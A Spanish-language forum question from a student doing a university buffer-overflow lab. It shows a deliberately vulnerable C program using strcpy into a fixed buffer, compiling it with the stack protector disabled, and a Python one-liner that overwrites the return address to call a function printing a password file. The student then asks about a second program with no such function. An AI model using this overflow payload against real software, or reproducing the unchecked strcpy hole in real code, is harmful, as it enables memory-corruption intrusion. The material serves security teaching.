# Realizar un desbordamiento de buffer

Tags: c, linux, overflow

Tengo un laboratorio en la universidad que consiste en realizar un desbordamiento de buffer con el siguiente programa en C llamado "actividad1.c"

```
#include <stdio.h> 
#include <string.h> 

void premio(){
    system (“cat password”);
}

int main(int argc, char *argv[]){
    char buffer[100];

    if (argc != 2){
      printf("Uso: %s argumento\n", argv[0]); 
      return -1;
    }

    strcpy(buffer, argv[1]); 
    printf ("%s\n", buffer); 
    return 0;
}
```

Con el fin de ejecutar la función premio y mostrar el contenido del archivo password

Lo logré de la siguiente forma:

```
gcc reto.c -o reto -fno-stack-protector
```

Comando para crear un ejecutable del archivo y quitar la proteccion contra desbordamiento de buffer

```
objdump -d reto > reto.asm
```

Para desensamblar el codigo y encontrar la direccion de memoria del metodo "premio"

```
./actividad $(python -c ‘print “Z” * 104 + “\x44\x84\x04\x08”’)
```

Y finalmente este que se encarga de ejecutar el programa “actividad1” en donde se le pasa un argumento en código Python que genera una cadena que contiene 104 letras "Z" seguidas y luego agrega la secuencia de caracteres hexadecimal "\x44\x84\x04\x08" que representan la dirección de memoria del método “premio” y esto logra un desbordamiento de buffer, lo que permite mostrar la contraseña

El problema es que ahora tengo que hacer lo mismo, pero con este código:

```
#include <stdio.h> 
#include <string.h> 

int main(int argc, char *argv[]){
    char buffer[64];
    
    if (argc == 1){
      printf("Uso: %s argumento\n", argv[0]); 
      return -1;
    }

    strcpy(buffer, argv[1]); 
    printf ("%s\n", buffer); 
    return 0;
}
```

Que como se muestra no incluye ninguna llamada a "cat password" y por eso no puedo entender como lograrlo. Gracias!

Comment: Sin ser un experto en C se me ocurre que quizá puedas insertar el código que genera esa función como parte del input. Es decir, en lugar de meter simplemente una llamada a la función, tendrás que meter además la función en sí

Comment: No entiendo la pregunta. Pero sí entendí que quieres hacer algo similar a lo que ví en un video. https://youtu.be/qpyRz5lkRjE

Comment: El objetivo es encontrar el EIP?... El segundo código solo ingresará el EIP ya que no tiene ninguna función de redireccionamiento.